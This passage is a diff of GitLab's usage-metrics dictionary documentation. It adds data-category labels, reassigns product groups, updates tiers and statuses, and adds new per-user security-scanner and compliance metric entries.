definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180517_projects_with_error_tracking_enabled.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `usage_activity_by_stage.monitor.projects_with_incidents` @@ -17024,11 +20066,13 @@ Count of unique projects with an incident [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180518_projects_with_incidents.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `usage_activity_by_stage.monitor.projects_with_tracing_enabled` @@ -17038,6 +20082,8 @@ Projects with tracing enabled Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17050,6 +20096,8 @@ Projects with package registry enabled Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17062,6 +20110,8 @@ Count of users creating assignee lists on Boards Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -17074,6 +20124,8 @@ Missing description Group: `group::plan` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -17086,6 +20138,8 @@ Count of users creating Issues Group: `group::project management` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17098,6 +20152,8 @@ Count of users creating label lists on Boards Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17110,6 +20166,8 @@ Count of users creating milestone lists on Boards Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -17122,6 +20180,8 @@ Count of users creating Notes on Issues Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17134,6 +20194,8 @@ Count of users creating projects Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17146,6 +20208,8 @@ Missing description Group: `group::plan` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -17158,6 +20222,8 @@ Missing description Group: `group::plan` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -17170,6 +20236,8 @@ Missing description Group: `group::plan` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -17182,6 +20250,8 @@ Missing description Group: `group::plan` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -17194,6 +20264,8 @@ Missing description Group: `group::plan` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -17206,6 +20278,8 @@ Count of users todos created Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17218,6 +20292,8 @@ Unique users triggering deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -17230,6 +20306,8 @@ Total failed deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -17242,6 +20320,8 @@ Count creator_id from projects with repository mirroring enabled. Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -17254,6 +20334,8 @@ Unique users creating release tags Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -17266,6 +20348,8 @@ Total successful deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -17278,10 +20362,26 @@ Counts API fuzzing jobs Group: `group::fuzz testing` +Data Category: `Operational` + Status: `data_available` Tiers: +### `usage_activity_by_stage.secure.cluster_image_scanning_scans` + +Counts cluster image scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210618124854_cluster_image_scanning_scans.yml) + +Group: `group::container security` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + ### `usage_activity_by_stage.secure.container_scanning_scans` Counts container scanning jobs @@ -17290,6 +20390,8 @@ Counts container scanning jobs Group: `group::container security` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -17302,6 +20404,8 @@ Counts fuzzing jobs Group: `group::fuzz testing` +Data Category: `Operational` + Status: `data_available` Tiers: @@ -17312,11 +20416,13 @@ Counts dast jobs [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182122_dast_scans.yml) -Group: `group::static analysis` +Group: `group::dynamic analysis` + +Data Category: `Operational` Status: `data_available` -Tiers: +Tiers: `ultimate` ### `usage_activity_by_stage.secure.dependency_scanning_scans` @@ -17326,6 +20432,8 @@ Total number of users running Dependency Scanning Scans Group: `group::composition analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -17338,21 +20446,25 @@ Counts sast jobs Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` -Tiers: +Tiers: `ultimate` ### `usage_activity_by_stage.secure.secret_detection_scans` -Counts secret detection jobs +counts secret detection jobs [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182123_secret_detection_scans.yml) Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` -Tiers: +Tiers: `ultimate` ### `usage_activity_by_stage.secure.user_api_fuzzing_dnd_jobs` @@ -17362,6 +20474,8 @@ Count of API Fuzzing `docker-in-docker` jobs by job name Group: `group::fuzz testing` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -17374,10 +20488,26 @@ Count of API Fuzzing jobs by job name Group: `group::fuzz testing` +Data Category: `Operational` + Status: `data_available` Tiers: `free` +### `usage_activity_by_stage.secure.user_api_fuzzing_scans` + +Number of users who have run a API Fuzzing scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607044126_user_api_fuzzing_scans.yml) + +Group: `category::fuzz testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage.secure.user_container_scanning_jobs` Distinct count per user of Container Scanning jobs run @@ -17386,6 +20516,22 @@ Distinct count per user of Container Scanning jobs run Group: `group::container security` +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_container_scanning_scans` + +Number of users who have run a Container Scanning scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043902_user_container_scanning_scans.yml) + +Group: `group::composition analysis` + +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -17398,10 +20544,26 @@ Missing description Group: `` +Data Category: `Operational` + Status: `data_available` Tiers: `free` +### `usage_activity_by_stage.secure.user_coverage_fuzzing_scans` + +Number of users who have run a Coverage Fuzzing scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607044040_user_coverage_fuzzing_scans.yml) + +Group: `category::fuzz testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage.secure.user_dast_jobs` Count of DAST jobs @@ -17410,10 +20572,26 @@ Count of DAST jobs Group: `group::dynamic analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free` +### `usage_activity_by_stage.secure.user_dast_scans` + +Number of users who have run a DAST scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043109_user_dast_scans.yml) + +Group: `group::dynamic analysis` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage.secure.user_dependency_scanning_jobs` Total number of users running Dependency Scanning jobs @@ -17422,6 +20600,22 @@ Total number of users running Dependency Scanning jobs Group: `group::composition analysis` +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_dependency_scanning_scans` + +Number of users who have run a Dependency Scanning scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043819_user_dependency_scanning_scans.yml) + +Group: `group::composition analysis` + +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -17434,6 +20628,8 @@ Total number of users running License Scanning jobs Group: `group::composition analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -17446,34 +20642,68 @@ Users who set personal preference to see Details on Group information page Group: `group::threat insights` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` ### `usage_activity_by_stage.secure.user_sast_jobs` -Count of SAST jobs +Count of SAST jobs per user [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182116_user_sast_jobs.yml) Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `usage_activity_by_stage.secure.user_sast_scans` + +Number of users who have run a SAST scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043741_user_sast_scans.yml) + +Group: `group::static analysis` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage.secure.user_secret_detection_jobs` -Count of Secret Detection Jobs +Count of Secret Detection Jobs per user [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182118_user_secret_detection_jobs.yml) Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `usage_activity_by_stage.secure.user_secret_detection_scans` + +Number of users who have run a Secret Detection scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043957_user_secret_detection_scans.yml) + +Group: `group::static analysis` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage.secure.user_unique_users_all_secure_scanners` Missing description @@ -17482,6 +20712,8 @@ Missing description Group: `group::secure` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -17494,6 +20726,8 @@ Unique count of builds in project Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17506,6 +20740,8 @@ Total pipelines in external repositories Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17518,6 +20754,8 @@ Total pipelines in GitLab repositories Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17530,6 +20768,8 @@ Total pipelines from an Auto DevOps template Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17542,6 +20782,8 @@ Total Pipelines from templates in repository Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17554,6 +20796,8 @@ Pipeline schedules in GitLab Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17566,6 +20810,8 @@ Distinct Users triggering Total pipelines Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17578,6 +20824,8 @@ Total configured Triggers in project Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17590,6 +20838,8 @@ Count of users creating managed clusters with Runner enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17602,6 +20852,8 @@ Projects with a GitHub service pipeline enabled Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -17614,6 +20866,8 @@ Total GitLab Managed clusters with Cert Manager enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17626,6 +20880,8 @@ Total GitLab Managed clusters with Helm enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17638,6 +20894,8 @@ Total GitLab Managed clusters with Ingress enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17650,6 +20908,8 @@ Total GitLab Managed clusters with Knative enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17662,6 +20922,8 @@ Total GitLab Managed disabled clusters Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17674,6 +20936,8 @@ Total GitLab Managed clusters currently enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17686,6 +20950,8 @@ Number of Kubernetes clusters with clusters management project being set Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17698,6 +20964,8 @@ Total GitLab Managed clusters provisioned with GitLab on AWS EKS Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17710,6 +20978,8 @@ Total GitLab Managed clusters provisioned with GitLab on GCE GKE Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17722,6 +20992,8 @@ Total GitLab Managed clusters that are user provisioned Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17734,6 +21006,8 @@ Total GitLab Managed disabled clusters attached to groups Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17746,6 +21020,8 @@ Total GitLab Managed enabled clusters attached to groups Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17758,6 +21034,8 @@ Total GitLab Managed disabled clusters attached to the instance Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17770,6 +21048,8 @@ Total GitLab Managed enabled clusters attached to the instance Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17782,6 +21062,8 @@ Total GitLab Managed disabled clusters attached to projects Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17794,6 +21076,8 @@ Total GitLab Managed enabled clusters attached to projects Group: `group::configure` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17806,6 +21090,8 @@ Unique projects created in the past 28 days that have Slack notifications enable Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17818,6 +21104,8 @@ Unique projects created in the past 28 days that have Slack ‘/’ commands ena Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17830,6 +21118,8 @@ Projects with Prometheus alerting enabled Group: `group::monitor` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -17842,6 +21132,8 @@ Monthly active users for design management Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17854,6 +21146,8 @@ Aggregated value for wiki, design, and project repo Git write actions Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17866,6 +21160,8 @@ Number of unique users per month who edited a file from any web editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17878,6 +21174,8 @@ Count of monthly active users who have performed any Git operation (read/write/p Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17890,6 +21188,8 @@ Number of users using single file editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17902,6 +21202,8 @@ Number of users using the snippet editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17914,6 +21216,8 @@ Number of users using the static site editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17926,6 +21230,8 @@ Number of users editing using web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17938,6 +21244,8 @@ Unique monthly active users of the Wiki Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17950,6 +21258,8 @@ Total number of project approval rules Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -17962,6 +21272,8 @@ Number of approval rules with the exact number of required approvers. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -17974,6 +21286,8 @@ Number of approval rules with fewer approvers than required. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -17986,6 +21300,8 @@ Number of approval rules with more approvers than required. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -17998,6 +21314,8 @@ Number of project approval rules scoped to a specific repo branch. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18010,6 +21328,8 @@ Count of users creating deploy keys in last 28 days. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18022,6 +21342,8 @@ Count of users creating regular keys in last 28 days. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18034,6 +21356,8 @@ Count of the number of users creating merge requests Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18046,6 +21370,8 @@ Monthly count of the number of merge request users Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18058,6 +21384,8 @@ Merge requests with added rules Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18070,6 +21398,8 @@ Count of merge requests with optional codeowner approval rules Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18082,6 +21412,8 @@ Number of merge requests which have overriden rules created at the project level Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18094,6 +21426,8 @@ Count of merge requests with required codeowner approval rules Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18106,6 +21440,8 @@ Count of total projects that require approval by code owners for code changes Group: `group::source code` +Data Category: `Operational` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18118,6 +21454,8 @@ Missing description Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -18130,6 +21468,8 @@ Count of the number of projects with setting to disable overriding approvers per Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18142,6 +21482,8 @@ Count of users creating projects that have a matching Git repository, result of Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18154,6 +21496,8 @@ Count of projects using code owners with code owners section feature Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18166,6 +21510,8 @@ Count of the number of projects without setting to disable overriding approvers Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18178,6 +21524,8 @@ Count of users creating projects with repositories making use of at least one pr Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18190,6 +21538,8 @@ Count of users creating projects with remote mirrors. Includes both push and pul Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18202,6 +21552,8 @@ Count of distinct author_id from snippets for last 28 days Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18214,6 +21566,8 @@ Count of unique users per month who create suggestions in merge request comments Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18226,6 +21580,8 @@ The total number of files which have been locked via the GitLab UI Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18238,6 +21594,8 @@ Number of paths/directories manually locked through the UI Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18250,6 +21608,8 @@ Number of unique users who have locked files or directories using LFS via the co Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18262,6 +21622,8 @@ Number of users creating path_locks in last 28 days. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18274,6 +21636,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18286,6 +21650,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18298,10 +21664,26 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` +### `usage_activity_by_stage_monthly.manage.compliance_frameworks_with_pipeline` + +Count of compliance frameworks that have a pipeline configuration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210622091519_compliance_frameworks_with_pipeline.yml) + +Group: `compliance` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + ### `usage_activity_by_stage_monthly.manage.custom_compliance_frameworks` Monthly count of all custom compliance framework labels @@ -18310,6 +21692,8 @@ Monthly count of all custom compliance framework labels Group: `compliance` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18322,6 +21706,8 @@ Missing description Group: `group::manage` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -18334,6 +21720,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -18346,6 +21734,8 @@ Number of group import states Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18358,6 +21748,8 @@ Whether group SAML is enabled Group: `group:access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18370,6 +21762,8 @@ Number of users who are group members for last 28 days Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18382,6 +21776,8 @@ Missing description Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18394,6 +21790,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -18406,6 +21804,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -18418,6 +21818,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -18430,6 +21832,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -18442,6 +21846,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18454,6 +21860,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18466,6 +21874,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18478,6 +21888,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18490,6 +21902,8 @@ Whether LDAP admin sync is enabled Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18502,6 +21916,8 @@ Has the instance configured [LDAP Group Sync](https://docs.gitlab.com/ee/adminis Group: `group::acess` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18514,6 +21930,8 @@ Number of users creating keys synced as part of LDAP for last 28 days. Group: `group::acess` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18526,6 +21944,8 @@ Number of LDAP servers configured Group: `group::manage` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18538,6 +21958,8 @@ Number of users that are linked to LDAP Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -18550,6 +21972,8 @@ Number of unique user logins using an OmniAuth provider Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18562,6 +21986,8 @@ Count of projects imported from Bitbucket Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18574,6 +22000,8 @@ Count of projects imported from Bitbucket Server Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18586,6 +22014,8 @@ Count of projects imported from Git Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18598,6 +22028,8 @@ Count of projects imported from Gitea Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18610,6 +22042,8 @@ Count of projects imported from GitHub Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18622,6 +22056,8 @@ Count of projects imported from GitLab using Project Export/Import Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18634,6 +22070,8 @@ Missing description Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18646,6 +22084,8 @@ Missing description Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18658,6 +22098,8 @@ Missing description Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18670,6 +22112,8 @@ Total count of projects imported Group: `group::import` +Data Category: `Optional` + Status: `implemented` Tiers: `free`, `premium`, `ultimate` @@ -18682,6 +22126,8 @@ Count of projects imported from Bitbucket Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -18694,6 +22140,8 @@ Count of projects imported from Bitbucket Server Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -18706,6 +22154,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18718,6 +22168,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18730,6 +22182,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18742,6 +22196,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18754,6 +22210,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18766,6 +22224,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18778,6 +22238,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -18790,6 +22252,8 @@ Missing description Group: `group::manage` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -18802,6 +22266,8 @@ Number of users from projects imported Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18814,6 +22280,8 @@ Number of unique user logins using Google OAuth authentication Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18826,6 +22294,8 @@ Number of unique user logins using password authentication Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18838,6 +22308,8 @@ Number of unique user logins using two factor authentication Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18850,6 +22322,8 @@ Number of unique user logins using two factor via a U2F device Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18862,6 +22336,8 @@ Number of unique user logins using two factor via a WebAuthn device Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18874,6 +22350,8 @@ Number of users created in the month Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18886,9 +22364,11 @@ Missing description Group: `group::manage` +Data Category: `Optional` + Status: `data_available` -Tiers: +Tiers: `premium`, `ultimate` ### `usage_activity_by_stage_monthly.monitor.clusters` @@ -18898,6 +22378,8 @@ Count users creating clusters in last 28 days. Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18910,6 +22392,8 @@ Users creating clusters with Prometheus enabled in last 28 days. Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18922,6 +22406,8 @@ Active users with enabled operations dashboard Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18934,6 +22420,8 @@ Active users with projects on operations dashboard Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -18946,7 +22434,9 @@ Count of projects with Incident SLA enabled Group: `group::monitor` -Status: `data_available` +Data Category: `Optional` + +Status: `deprecated` Tiers: `premium`, `ultimate` @@ -18956,11 +22446,13 @@ Count of unique projects with an incident from an alert created in the last mont [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180526_projects_with_alert_incidents.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `usage_activity_by_stage_monthly.monitor.projects_with_error_tracking_enabled` @@ -18970,6 +22462,8 @@ Count of users creating projects with error tracking enabled. Group: `group::monitor` +Data Category: `Optional` + Status: 